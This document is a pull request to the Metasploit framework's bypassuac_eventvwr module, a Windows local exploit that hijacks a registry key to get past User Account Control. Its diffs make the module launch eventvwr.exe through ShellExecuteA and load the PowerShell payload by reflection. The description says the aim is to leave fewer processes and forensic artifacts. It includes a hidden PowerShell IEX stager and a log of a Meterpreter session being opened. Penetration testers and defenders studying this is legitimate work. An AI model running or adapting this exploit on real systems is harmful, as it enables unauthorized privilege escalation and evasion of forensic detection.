### PR TITLE
bypassuac_eventvwr optimizations - reduce created processes and artifacts

### DIFF
--- a/modules/exploits/windows/local/bypassuac_eventvwr.rb
+++ b/modules/exploits/windows/local/bypassuac_eventvwr.rb
@@ -134,8 +134,8 @@ class MetasploitModule < Msf::Exploit::Local
     result = client.railgun.shell32.ShellExecuteA(nil, 'open', cmd_path, nil, nil, 'SW_HIDE')
 
     if result['return'] > 32 then
-      print_good("eventvwr.exe executed successfully, waiting 5 seconds for the payload to execute.")
-      Rex::sleep(5)
+      print_good("eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.")
+      Rex::sleep(10)
     else
       print_error("eventvwr.exe execution failed with Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
     end

--- a/modules/exploits/windows/local/bypassuac_eventvwr.rb
+++ b/modules/exploits/windows/local/bypassuac_eventvwr.rb
@@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     handler(client)
 
-    print_status("Cleaining up registry keys ...")
+    print_status("Cleaning up registry keys ...")
     if existing.empty?
       registry_deletekey(EVENTVWR_DEL_KEY, registry_view)
     else

--- a/modules/exploits/windows/local/bypassuac_eventvwr.rb
+++ b/modules/exploits/windows/local/bypassuac_eventvwr.rb
@@ -131,16 +131,15 @@ class MetasploitModule < Msf::Exploit::Local
 
     cmd_path = expand_path("#{eventvwr_cmd}")
     print_status("Executing payload: #{cmd_path}")
-    
     result = client.railgun.shell32.ShellExecuteA(nil, 'open', cmd_path, nil, nil, 'SW_HIDE')
-    
+
     if result['return'] > 32 then
       print_good("eventvwr.exe executed successfully, waiting 5 seconds for the payload to execute.")
       Rex::sleep(5)
     else
       print_error("eventvwr.exe execution failed with Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
     end
-      
+
     handler(client)
 
     print_status("Cleaning up registry keys ...")

--- a/modules/exploits/windows/local/bypassuac_eventvwr.rb
+++ b/modules/exploits/windows/local/bypassuac_eventvwr.rb
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Local
     psh_path = expand_path("#{PSH_PATH}")
 
     template_path = Rex::Powershell::Templates::TEMPLATE_DIR
-    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
+    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload.encoded)
 
     psh_stager = "\"IEX (Get-ItemProperty -Path #{EVENTVWR_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
     cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

--- a/modules/exploits/windows/local/bypassuac_eventvwr.rb
+++ b/modules/exploits/windows/local/bypassuac_eventvwr.rb
@@ -19,6 +19,7 @@ class MetasploitModule < Msf::Exploit::Local
   EXEC_REG_VAL        = '' # This maps to "(Default)"
   EXEC_REG_VAL_TYPE   = 'REG_SZ'
   EVENTVWR_PATH       = "%WINDIR%\\System32\\eventvwr.exe"
+  EVENTVWR_WOW64_PATH = "%WINDIR%\\SysWOW64\\eventvwr.exe"
   PSH_PATH            = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
   CMD_MAX_LEN         = 2081
 
@@ -70,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    commspec = '%COMSPEC%'
+    eventvwr_cmd = EVENTVWR_PATH
     registry_view = REGISTRY_VIEW_NATIVE
 
     # Make sure we have a sane payload configuration
@@ -80,18 +81,7 @@ class MetasploitModule < Msf::Exploit::Local
       if session.arch == ARCH_X86
         # running WOW64, map the correct registry view
         registry_view = REGISTRY_VIEW_64_BIT
-
-        if target_arch.first == ARCH_X64
-          # we have an x64 payload specified while using WOW64, so we need to
-          # move over to sysnative
-          commspec = '%WINDIR%\\Sysnative\\cmd.exe'
-        else
-          # Else, we're 32-bit payload, so need to ref wow64.
-          commspec = '%WINDIR%\\SysWOW64\\cmd.exe'
-        end
-      elsif target_arch.first == ARCH_X86
-        # We're x64, but invoking x86, so switch to SysWOW64
-        commspec = '%WINDIR%\\SysWOW64\\cmd.exe'
+        eventvwr_cmd = EVENTVWR_WOW64_PATH
       end
     else
       # if we're on x86, we can't handle x64 payloads
@@ -139,20 +129,18 @@ class MetasploitModule < Msf::Exploit::Local
     registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
     registry_setvaldata(EVENTVWR_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
 
-    # We can't invoke EventVwr.exe directly because CreateProcess fails with the
-    # dreaded 740 error (Program requires elevation). Instead, we must invoke
-    # cmd.exe and use that to fire off the binary.
-    cmd_path = expand_path(commspec)
-    cmd_args = expand_path("/c #{EVENTVWR_PATH}")
-    print_status("Executing payload: #{cmd_path} #{cmd_args}")
-
-    # We can't use cmd_exec here because it blocks, waiting for a result.
-    client.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true})
-
-    # Wait a copule of seconds to give the payload a chance to fire before cleaning up
-    # TODO: fix this up to use something smarter than a timeout?
-    Rex::sleep(5)
-
+    cmd_path = expand_path("#{eventvwr_cmd}")
+    print_status("Executing payload: #{cmd_path}")
+    
+    result = client.railgun.shell32.ShellExecuteA(nil, 'open', cmd_path, nil, nil, 'SW_HIDE')
+    
+    if result['return'] > 32 then
+      print_good("eventvwr.exe executed successfully, waiting 5 seconds for the payload to execute.")
+      Rex::sleep(5)
+    else
+      print_error("eventvwr.exe execution failed with Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
+    end
+      
     handler(client)
 
     print_status("Cleaning up registry keys ...")


### PR DESCRIPTION
This pull request switches the bypassuac_eventvwr module to use ShellExecuteA to spawn eventvwr.exe, as opposed to cmd /c, as well as using reflection for executing the payload. This reduces the amount of processes and forensic artifacts that the module creates.

## Verification

List the steps needed to make sure this thing works

- [X] Start `msfconsole`
- [X] `use exploit/windows/local/bypassuac_eventvwr`
`[*] Started reverse TCP handler on 127.0.0.1:4444`
`[*] UAC is Enabled, checking level...`
`[+] Part of Administrators group! Continuing...`
`[+] UAC is set to Default`
`[+] BypassUAC can bypass this setting, continuing...`
`[*] Configuring payload and stager registry keys ...`
`[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe`
`[+] eventvwr.exe executed successfully, waiting 5 seconds for the payload to execute.`
`[*] Sending stage (179779 bytes) to 127.0.0.1`
`[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49350) at 2018-10-24 01:59:32 +0000`
`[*] Cleaning up registry keys ...`

- [x] **Verify** the thing does what it should